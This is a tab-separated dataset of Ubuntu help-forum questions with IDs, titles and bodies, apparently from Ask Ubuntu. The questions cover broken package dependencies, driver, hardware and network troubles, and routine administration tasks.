337282	errors in configuration after skype installation : libqtgui4 : i386 , libtiff4 : i386 , libqt4-declarative : i386 , libqtwebkit4 : i386,	i am using the ubuntu precise ( 12.04 lts ) . i have some errors in configuration after skype ( downloaded from the site of skype ) installation . at this moment i ca n't install nothing , even using ubuntu software center . maybe the source of these errors was that i followed the procedure described in how to install codelite on ubuntu ? to install the codelite . i removed the codelite and its repository ( 'deb http : //repos.codelite.org/ubuntu/ precise universe ' ) . then i reinstalled skype . but now : the skype is working , the operating system has configuration errors , and i ca n't install nothing . below i am putting the suggestions of solution ( `` third '' block of code ) : $ dpkg -s /usr/share/lintian/overrides/libtiff4 libtiff4 : /usr/share/lintian/overrides/libtiff4 $ export lang=c $ sudo dpkg -- purge libtiff4 dpkg : dependency problems prevent removal of libtiff4 : libcupsimage2 depends on libtiff4 . libpoppler19 depends on libtiff4 . libtiff4-dev depends on libtiff4 ( = 3.9.5-2ubuntu1.5 ) . libevince3-3 depends on libtiff4 . libdevil1c2 depends on libtiff4 ; however : package libtiff4 is to be removed . libgs9 depends on libtiff4 . libopencv-highgui2.3 depends on libtiff4 . libtiff-tools depends on libtiff4 . gimp-plugin-registry depends on libtiff4 ; however : package libtiff4 is to be removed . libcupsfilters1 depends on libtiff4 . libtiffxx0c2 depends on libtiff4 . libgdk-pixbuf2.0-0 depends on libtiff4 . libqtgui4 depends on libtiff4 . libspandsp2 depends on libtiff4 . libwxgtk2.8-0 depends on libtiff4 ; however : package libtiff4 is to be removed . libsane depends on libtiff4 . libmagickcore4 depends on libtiff4 . gimp depends on libtiff4 . dpkg : error processing libtiff4 ( -- purge ) : dependency problems - not removing errors were encountered while processing : libtiff4 $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libtiff4 ; however : package libtiff4 : i386 is not installed . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : i386 : libqt4-declarative : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.4 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-declarative : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtwebkit4 : i386 : libqtwebkit4 : i386 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqtwebkit4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of skype : i386 : skype : i386 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 : i386 is not configured yet . skype : i386 depends on libqtwebkit4 ( > = 2.2~2011week36 ) ; however : package libqtwebkit4 : i386 is not configured yet . dpkg : error processing skype : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqtgui4 : i386 libqt4-declarative : i386 libqtwebkit4 : i386 skype : i386 $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-44-generic libunistring0 libwxsqlite3-2.8-0 linux-headers-3.2.0-44 po-debconf g++ intltool-debian gettext nvidia-settings-updates qt4-qmake latex-cjk-xcjk linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 libgettextpo0 wx-common texlive-lang-ukenglish libmail-sendmail-perl libsys-hostname-long-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libtiff4 : i386 the following new packages will be installed : libtiff4 : i386 0 upgraded , 1 newly installed , 0 to remove and 24 not upgraded . 4 not fully installed or removed . need to get 0 b/143 kb of archives . after this operation , 501 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 417982 files and directories currently installed . ) unpacking libtiff4 : i386 ( from ... /libtiff4_3.9.5-2ubuntu1.5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb ( -- unpack ) : './usr/share/lintian/overrides/libtiff4 ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get -- reinstall install libtiff4 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ $ sudo apt-get update $ sudo apt-get -f install ( reading database ... 417982 files and directories currently installed . ) unpacking libtiff4 : i386 ( from ... /libtiff4_3.9.5-2ubuntu1.5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb ( -- unpack ) : './usr/share/lintian/overrides/libtiff4 ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not installed e : unmet dependencies . try using -f. $ $ sudo apt-get -f install libqtgui4 reading package lists ... done building dependency tree reading state information ... done libqtgui4 is already the newest version . libqtgui4 set to manually installed . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ sudo apt-get install libtiff4 : i386 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-44-generic libunistring0 libwxsqlite3-2.8-0 linux-headers-3.2.0-44 po-debconf g++ intltool-debian gettext nvidia-settings-updates qt4-qmake latex-cjk-xcjk linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 libgettextpo0 wx-common texlive-lang-ukenglish libmail-sendmail-perl libsys-hostname-long-perl use 'apt-get autoremove ' to remove them . the following new packages will be installed : libtiff4 : i386 0 upgraded , 1 newly installed , 0 to remove and 28 not upgraded . 4 not fully installed or removed . need to get 0 b/143 kb of archives . after this operation , 501 kb of additional disk space will be used . ( reading database ... 417982 files and directories currently installed . ) unpacking libtiff4 : i386 ( from ... /libtiff4_3.9.5-2ubuntu1.5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb ( -- unpack ) : './usr/share/lintian/overrides/libtiff4 ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done del codelite 5.2-1.precise [ 21.3 mb ] del sdformat 1.4.5-1~precise [ 323 kb ] del gazebo 1.9.0-1~precise [ 37.2 mb ] del wxcrafter 1.2-1.precise [ 2314 kb ] del gazebo 1.9.1-1~precise [ 37.2 mb ] $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not installed e : unmet dependencies . try using -f. sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-44-generic libunistring0 libwxsqlite3-2.8-0 linux-headers-3.2.0-44 po-debconf g++ intltool-debian gettext nvidia-settings-updates qt4-qmake latex-cjk-xcjk linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 libgettextpo0 wx-common texlive-lang-ukenglish libmail-sendmail-perl libsys-hostname-long-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libtiff4 : i386 the following new packages will be installed : libtiff4 : i386 0 upgraded , 1 newly installed , 0 to remove and 28 not upgraded . 4 not fully installed or removed . need to get 0 b/143 kb of archives . after this operation , 501 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 417982 files and directories currently installed . ) unpacking libtiff4 : i386 ( from ... /libtiff4_3.9.5-2ubuntu1.5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb ( -- unpack ) : './usr/share/lintian/overrides/libtiff4 ' is different from the same file on the system errors were encountered while processing : /var/cache/apt/archives/libtiff4_3.9.5-2ubuntu1.5_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not installed e : unmet dependencies . try using -f. $ sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not installed e : unmet dependencies . try using -f. $ the trials until now : $ sudo apt-get update $ sudo apt-get -f install $ sudo dpkg -- configure -a $ sudo dpkg -- purge libtiff4 $ sudo apt-get -- reinstall install libtiff4 $ sudo apt-get install libtiff4 : i386 $ sudo apt-get autoclean $ sudo apt-get autoremove $ sudo apt-get -f install trying to get a solution at : how do i resolve unmet dependencies ? $ sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqtgui4 : i386 : depends : libtiff4 : i386 but it is not installed e : unmet dependencies . try using -f. $ sudo apt-get remove libqtgui4 : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-declarative : i386 : depends : libqtgui4 : i386 ( = 4:4.8.1-0ubuntu4.4 ) but it is not going to be installed libqtwebkit4 : i386 : depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed skype : i386 : depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
337284	headphone not working ? ubuntu 12.10	okay , so i just installed ubuntu alongside windows 7 and my headphones dont seem to be working , when i plug in my headphones the sound continues to come out of the speakers built into my laptop .
337288	the following packages have unmet dependencies ( kde )	i 'm new to ubuntu but i failed to solve this error . i had searched for this problem but i did n't find the perfect solution . please help me . i 'm finding this error . please give me a perfect solution because this error does n't let me to install any software . the error is : the following packages have unmet dependencies : software-properties-kde : depends : python3 ( > = 3.2.3-3~ ) but 3.3.1-0ubuntu1 is to be installed depends : python3-pyqt4 but it is not going to be installed ''
337289	recommended wireless printer that will work with ubuntu ?	the title says it all : can anyone here recommend a wireless printer that will work with ubuntu ? it would be nice if it had a scanner , but the wireless is what 's really important to me , and is also the main component i fear may not work on linux . there are a number of sites with various suggestions , but many of them are outdated . so , any suggestions ?
337293	wifi stopped working on xubuntu	today i turned on my notebook and i could n't connect to my network , it just keeps asking for my password . that 's weird because i 've been using it on this network forever and never saw this error . so i restarted my router thinking that could be the problem , and nope , both my desktop computers connect fine but my notebook still ca n't connect . so i boot my notebook on windows 7 and it connects just fine , so it 's not a hardware thing ... the encryption im using is wpa & wpa2 personal , and the wireless card is rtl8111/8168 pci express gigabit why ca n't i connect to wifi on my xubuntu notebook ?
337300	are there any games which can train people to learn terminal commands ?	it seems to me learning how to use the terminal is a prerequisite to learning how to use ubuntu . so i 'm trying to figure out the best way to learn . is there a quizlet online flash card set out there ? a better way ?
337301	boot from a partition ( windows 8 )	i 'm currently running windows 8 on an hp pavilion g7 laptop and i tried installing ubuntu 13.04 from my flash drive just recently . installation went as normal and i created a 50 gb partition for it . at the end it said i needed to reboot so i pressed ok. a few seconds later an error message popped up and said there was an error and i needed to reboot ( or i could stay at the desktop and debug or something ) . i clicked stay at desktop but it kicked me out into a command line and i really could n't do anything there so i just held the power button and shut it off . now i have the partition made ( it shows up in windows as the g : drive ) , i just have no way to access it without booting from live disk/usb . is there some way i can pick which partition to boot from when i power my laptop on ? edit : do n't know if it helps much but i remember my caps lock key flashing when i was stuck at the command line thing . ( maybe someone will know what i was at from this ? ) edit : i have a 500 gb disk , and i created the partition in the ubuntu setup itself . i 'm a little busy but i 'll try a few of the suggestions in a little while and see how it goes
337304	how to start the dictionary application after installation ?	i installed a dictionary application using this site : - http : //www.noobslab.com/2011/07/install-offline-ubuntu-dictionary.html but after installation when i searched for it on / , i did n't see any application file that was to be launched ( like i do for other applications ) . could anyone help me open this application please ? if not , is there any good dictionary app that i can install instead ?
337305	back up sshfs network drive to crashplan ?	i often develop and test code on several remote machines , which are n't all on the same nfs filesystem . for interactive work , i usually use sshfs to mount remote filesystems on my local machine . for example : mkdir ~/machine1 sshfs me @ machine1.domain.org : ~/machine1 # mount machine1 's home directory locally i 've been using crashplan for the last couple of years to back up my local hard disks . i 'd like to start using crashplan to backup remote disks that are mounted locally . in the crashplan ui , it gives me the option to back up ~/machine1 . however , crashplan thinks that the ~/machine1 directory is empty , even when machine1.domain.org is mounted there . how can i get crashplan to `` see '' drives that i 've mounted using sshfs ? a few closing thoughts : i expect that backing up an sshfs-mounted drive will be pretty slow . i 'm not too worried about the speed ; i just have small bits and pieces of data on each of these remote drives . i could probably install crashplan on all the remote machines . but , this would be my last resort : crashplan does n't have a command-line interface that i know of , so managing crashplan on a headless machine is n't very fun .
337307	boot problem in ubuntu	yesterday night i directly shutdown my computer by pressing the shutdown key from the keyboard . this morning when i started my computer , a purple screen appears , then ubuntu logo loads but it does n't go to the login screen , instead a black screen with a cursor on upper left screen appears , and then nothing happens . i am new to ubuntu . please help me fix this problem without having to reinstall ubuntu .
337314	how to hide/remove rhythmbox now playing pop-up/notification ?	everytime a song is played on rhythmbox from my playlist a pop-up on the upper-right side of the screen shows . how could i hide it ?
337318	huawei ec156 tata photon+ not working in ubuntu 12.04 lts	my tata photon device will shows up in the terminal when i ran the command lsusb . however , it does n't show on the desktop . it also does n't work as a flash drive .
337320	my laptop is becoming slower at times , how can i figure out if it is a hardware or a software issue ?	over the last month my 15 month old laptop has started showing me 100 % cpu utilization . i used to have ubuntu 12.10 on it . i did a clean install of ubuntu 13.04 on it and it was fine for a while . i run pycharm , a couple of django servers , mongodb , mysql , chrome , firefox , a music player etc . my computer usage has not changed over the last year . i have run 12.04 and 12.10 very comfortably before this . my previous laptop got screwed over 3 years and i am suspecting the same is happening here as well , but i can not see anything , like the laptop overheating etc . i have a thinkpad 420i with i3 processor and 8 gigs of ram it shows cpu utilization for about 10 minutes after startup . i have to confess that i start all my programs with a single bash script . after that the system usually behaves well but sometimes it starts to annoy me again . the question is that i want to investigate and figure out if it is software issue or hardware issue . if it is hardware , i want to get stuff fixed before everything goes south . how do i do it ?
337327	ubuntu development on 2nd gen nexus 7 ?	i was reading the steps over at https : //wiki.ubuntu.com/nexus7/installation but i do n't see the 2nd gen nexus 7 ever mentioned . it 's also not in the faq , and before i follow through with it i just wanted to make sure this is supported on the 2nd gen nexus as well . i see no reason it should n't work , just wanted to make sure before i give it a go .
337328	php api not matching	i need to enable a module installed on my system . i have installed php 5.4 from ondrej 's repository couple of months ago ago and now i have compiled odbtp module from the source . unfortunately , if only i enable this module i receive an error causing all the php scripts failure : php warning : php startup : odbtp : unable to initialize module module compiled with module api=20090626 php compiled with module api=20100525 these options need to match in unknown on line 0 i think i understand what it 's trying to tell me , i wanted to compile php from source , so that it would have matching version of api , however i ca n't find the source for my version of php ... if you need any more details , i will be glad to provide them .
337330	installing pptpd on ubuntu ec2	i am running this line in ubuntu : sudo apt-get install pptpd and here 's the output i get : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : bcrelay the following new packages will be installed : bcrelay pptpd 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 96.2 kb of archives . after this operation , 446 kb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ natty/main bcrelay amd64 1.3.4-3ubuntu1 403 forbidden err http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ natty/main pptpd amd64 1.3.4-3ubuntu1 403 forbidden failed to fetch http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/pptpd/bcrelay_1.3.4-3ubuntu1_amd64.deb 403 forbidden failed to fetch http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/pptpd/pptpd_1.3.4-3ubuntu1_amd64.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? what am i doing wrong ? is this a known issue ?
337331	migrate ubuntu to smaller partition	i have a 320 gb hdd , and i want to migrate my ubuntu system to a 60 gb ssd i bought . i have an ext4 root partition and a swap partition . the root partition has 314 gb , but my files take up 50 gb , the rest is free space , so my partition is larger than the ssd , but my files can fit in it . i have already partitioned the ssd with a 54 gb ext4 partition and a swap partition , now i only need to move my files to it . what is the best approach here - using cp , dd , gparted , or something else ?
337333	how to use sftp in filezilla ?	how to encrypt the connection with server using filezilla in linux ? i read , it is possible in windows using putty . just wondering how to do it in ubuntu ?
337334	libjackd2 broken package	can anyone help me with this ? during dist upgrade something happened , broken packages occured and unmet dependecies are shown , so after that in the terminal asked me to type in this command `` apt-get -f install '' and so i did try that and this is what i got : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libjack-jackd2-0 libjack-jackd2-0 : i386 suggested packages : jackd2 jackd2 : i386 the following new packages will be installed : libjack-jackd2-0 libjack-jackd2-0 : i386 0 upgraded , 2 newly installed , 0 to remove and 6 not upgraded . need to get 0 b/398 kb of archives . after this operation , 996 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package libjack-jackd2-0 . ( reading database ... 248346 files and directories currently installed . ) unpacking libjack-jackd2-0 ( from ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... selecting previously unselected package libjack-jackd2-0 : i386 . unpacking libjack-jackd2-0 : i386 ( from ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried the following : sudo dpkg -- configure -a < -- - did n't work , sudo apt-get -f install < -- - did n't work , sudo gedit /var/lib/dpkg/status < -- -- i tried removing the broken package , still the same after using `` sudo fuser -vki /var/lib/dpkg/lock '' . hmmmm.. help pls.. i 'm stuck , and if this is a duplicate post regarding libjackd2 can anyone redirect me to another post which was solved ? ..
337335	system settings is missing	system settings is missing . i tried reinstall it as it mentioned here , but it seems to be installed and deactivated . this problem occurred when i installed elementary desktop environment and uninstalled it afterwards .
337338	connect to school network drive	i have a problem : my school have a network drive , called i : \ , which i can connect to from windows 8 , but i cant do it from ubuntu : ( i am a complete linux noob , so its probably just because i dont know how to , but i write the info i need to connect from windows , so i hope you will help me : ) share ( at least i think so ) : \vihcafil11.global.local\elevhome $ \ums\htx\*username* username : global\*username* password : *password* if you know how to do it , please help me ^^ jonas strand
337341	libreoffice writer dispalys extra dash underscore _ after each persian/arabic character !	i have similar problem in the libreoffice ( version 4.0.2.2 ) . my ubuntu is 13.04 if i type الآن in my libreoffice writer , it displays : اـلآــن‌ـ libreoffice displays a dash ( underscore ) : _ after each persian character and if i type some characters this dashes may change position or be reduced : ا اـ ال اـل‌ـ الآ اـلآــ الآن ا_لآــن‌ـ above i typed some samples of what i type what libreoffice displays . this problem only occurs in libreoffice writer , not in calc , nor in firefox .
337344	amd proprietary drivers can only use 2 monitors ( ubuntu 13.04 )	i have 4 monitors i 'm trying to set up in unity with 2 gpu 's ( 2x amd hd7970 's ) . originally i had 2 monitors on each card and tried to set it up that way , but i kept getting the white screen of death and could not resolve the problem . i then decided to put all 4 monitors on a single card ( 1 hdmi , 2 dvi , 1 mini display port ) and crossfire with the second card . upon a fresh install , the open source drivers worked and all four monitors worked correctly . the problem is that the open source drivers caused unity to run excruciatingly slow , making it very difficult to work with . when i say slow , i mean the cursor was slow , windows would take several seconds to slowly fade in , responsiveness was slow , etc ... . i decided to check out the proprietary drivers , because i had read that the open source drivers do n't really handle 3d acceleration correctly . i installed the amd 13.04 drivers from the website , and got 2 monitors to appear , but i can not get the other two to activate . just to be clear , all four monitors are recognized by the drivers , but when i try to activate them in catalyst ( using sudo amdcccle ) the changes are ignored and only 2 monitors are used . when i try xinerama all 4 screens will 'turn on ' and be recognized , but unity turns black and no windows appear ( the only thing i can see is the cursor ) . when i try to use randr it complains about requested size and then a maximum/minimum virtual size ( something similar to the following : the selected configuration for displays could not be applied required virtual size does not > fit available size : requested= ( 2646 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1366,1366 ) . as a result i 've tried going into xorg.conf and adjusting the virtual size as recommended here : multi screen problems `` virtual size does not fit available size '' . i 've also tried the amdcccle solution provided in that article . if i try to activate the other 2 windows and arrange them in randr it says it 's unable to make the requested change ( i believe a error with ctrc 148 ) . at this point i 'm not sure what to try to make all my monitors work with ubuntu while allowing 3d acceleration for reasonable performance . how can i fix this , is it possible ? is this issue with all gnome desktops , or just unity ? i 've been debating switching to kubuntu just because this problem is kind of debilitating and i hear kde runs better with multiple monitors , but i 'd really prefer to stay in unity if possible . note : i will try to post my xorg.conf once i log into ubuntu , i 'm writing this from my windows bootup
337351	two keyboards two language layouts	i want to connect two keyboard sets to my computer . is it possible to set each for a specific language . so that there 's no need to change language each time . for example : keyboard 1 types russian keyboard 2 types english
337352	canon lbp 2900 printer for ubuntu 13.04 ?	i had to recreate my computer and have installed ubuntu 13.04 as my main os . as a printer i would like to install a canon isensys lbp 2900 printer . the printer-setup recognizes the device , but it won't allow me to install the proper driver for this device - simply because there seems to be none available . is that true ? i checked the various similar topics about this issue , but they are either outdated and the data-packages ( drivers ) are not available anymore or about older/ earlier ubuntu versions . thank you for any advice or help or support . best wishes ! liam
337357	how to use gtk2.0 2.24.6-0ubuntu5 on ubuntu 12.04 running gtk2.0 2.24.10-0ubuntu6 ?	i have installed ubuntu 12.04 which is using `` gtk2.0 2.24.10-0ubuntu6 '' . the gtk applications that i am using run on the older version `` gtk2.0 2.24.6-0ubuntu5 '' . how do i revert or use the older version of gtk ? thanks in advance .
337359	sharing server to several computers at home	i want to build such a system . i have one new desktop ( server with 8 core cpu , 8gb of ram and hd7770 gpu ) and two clients ( old desktop and old laptop ) connected using gigabit network . i want to make server act like some terminal server for client pcs . for example , i want to play 3d game on my old laptop while old desktop is being used to browse web or watch video at same time ( i.e . full independent experience on each client ) . all machines will run ubuntu . i 'm not sure whether should i use several x11+vnc sessions on one host os or use some virtualization technology to run two different guest oses for clients on the server or may be other way . can you please suggest me some solution ? note again , that the requirement is running heavy multimedia apps , that require full-resolution full-color motion picture ( at > 30fps ) , sound and lagfree mouse/keyboard input transferring over a network.sorry for my poor english please .
337361	unable to install uml-utilities	trying to setup uml environment on ubuntu 13.04 pc . apt-get install uml-utilities gives me : failed to fetch http : //hk.archive.ubuntu.com/ubuntu/pool/universe/u/uml-utilities/uml-utilities_20070815-1.3ubuntu1_i386.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i 'm a bit suspicious about the data of the package which is 6 years old . any pointers ?
337366	problem removing apcupsd package from ubuntu 12.04	i have recently installed apcupsd package from my system and then decided to remove it . when i try to remove it it fails.below is some info : > uname -a linux 3.5.0-26-generic # 42~precise1-ubuntu smp mon > mar 11 22:17:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux > > sudo apt-get -f install apcupsd reading package lists ... done building > dependency tree reading state information ... done apcupsd is > already the newest version . 0 upgraded , 0 newly installed , 0 to remove > and 7 not upgraded . 1 not fully installed or removed . need to get 0 > b/281 kb of archives . after this operation , 0 b of additional disk > space will be used . do you want to continue [ y/n ] ? > > ( reading database ... 454090 files and directories currently > installed . ) preparing to replace apcupsd 3.14.10-1 ( using > ... /apcupsd_3.14.10-1_amd64.deb ) ... unpacking replacement apcupsd ... > invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . cat : > /var/lib/acpi-support/system-manufacturer : no such file or directory > cat : /var/lib/acpi-support/system-product-name : no such file or > directory cat : /var/lib/acpi-support/system-version : no such file or > directory cat : /var/lib/acpi-support/bios-version : no such file or > directory dpkg : warning : subprocess old post-removal script returned > error exit status 1 dpkg - trying script from the new package instead > ... invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . > cat : /var/lib/acpi-support/system-manufacturer : no such file or > directory cat : /var/lib/acpi-support/system-product-name : no such file > or directory cat : /var/lib/acpi-support/system-version : no such file > or directory cat : /var/lib/acpi-support/bios-version : no such file or > directory dpkg : error processing > /var/cache/apt/archives/apcupsd_3.14.10-1_amd64.deb ( -- unpack ) : > subprocess new post-removal script returned error exit status 1 > invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . cat : > /var/lib/acpi-support/system-manufacturer : no such file or directory > cat : /var/lib/acpi-support/system-product-name : no such file or > directory cat : /var/lib/acpi-support/system-version : no such file or > directory cat : /var/lib/acpi-support/bios-version : no such file or > directory dpkg : error while cleaning up : subprocess new post-removal > script returned error exit status 1 processing triggers for ureadahead > ... processing triggers for man-db ... errors were encountered while > processing : /var/cache/apt/archives/apcupsd_3.14.10-1_amd64.deb e : > sub-process /usr/bin/dpkg returned an error code ( 1 ) > > sudo apt-get remove apcupsd reading package lists ... done building > dependency tree reading state information ... done the following > packages will be removed : apcupsd 0 upgraded , 0 newly installed , 1 > to remove and 7 not upgraded . 1 not fully installed or removed . after > this operation , 749 kb disk space will be freed . do you want to > continue [ y/n ] ? dpkg : error processing apcupsd ( -- remove ) : package > is in a very bad inconsistent state - you should reinstall it before > attempting a removal . errors were encountered while processing : > apcupsd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can somebody help please ? thank you yannis i have tried everything and for some reason it does not uninstall ! sudo apt-get -- reinstall install apcupsd reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 7 not upgraded . 17 not fully installed or removed . need to get 0 b/281 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 454211 files and directories currently installed . ) preparing to replace apcupsd 3.14.10-1 ( using ... /apcupsd_3.14.10-1_amd64.deb ) ... unpacking replacement apcupsd ... invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . cat : /var/lib/acpi-support/system-manufacturer : no such file or directory cat : /var/lib/acpi-support/system-product-name : no such file or directory cat : /var/lib/acpi-support/system-version : no such file or directory cat : /var/lib/acpi-support/bios-version : no such file or directory dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . cat : /var/lib/acpi-support/system-manufacturer : no such file or directory cat : /var/lib/acpi-support/system-product-name : no such file or directory cat : /var/lib/acpi-support/system-version : no such file or directory cat : /var/lib/acpi-support/bios-version : no such file or directory dpkg : error processing /var/cache/apt/archives/apcupsd_3.14.10-1_amd64.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 1 invoke-rc.d : unknown initscript , /etc/init.d/apcupsd not found . cat : /var/lib/acpi-support/system-manufacturer : no such file or directory cat : /var/lib/acpi-support/system-product-name : no such file or directory cat : /var/lib/acpi-support/system-version : no such file or directory cat : /var/lib/acpi-support/bios-version : no such file or directory dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 processing triggers for ureadahead ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/apcupsd_3.14.10-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sudo apt-get remove apcupsd reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : apcupsd 0 upgraded , 0 newly installed , 1 to remove and 7 not upgraded . 17 not fully installed or removed . after this operation , 749 kb disk space will be freed . do you want to continue [ y/n ] ? dpkg : error processing apcupsd ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : apcupsd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
337370	`` unable to find a medium containing a live file system '' 12.04.3	i created bootable usb of 12.04.3 64bit using universal usb installer . when i boot , after the plymouth splash it switches to console mode and i get `` unable to find a medium containing a live file system '' error . ubuntu 12.04.2 , 12.10 , 13.04 , 13.10 all work when i create bootable usb with the same method . i downloaded the .iso again and checked md5 and the .iso is correct . i tried other software like rufus , unetbootin and the ubuntu 's startup disc creator and no success . it only happens on 12.04.3 so it should n't be hardware problem . should i report a bug ?
337375	loading data into mysql database using cron	i would like to make the loading of data into mysql database ( ubuntu 12.04 ) a cron job . i have am able to do it manually using the code : load local data infile re.txt into table rasss lines terminated by '|' i also know how to add a job to the crontab -e file , but i have only done so for single line commands
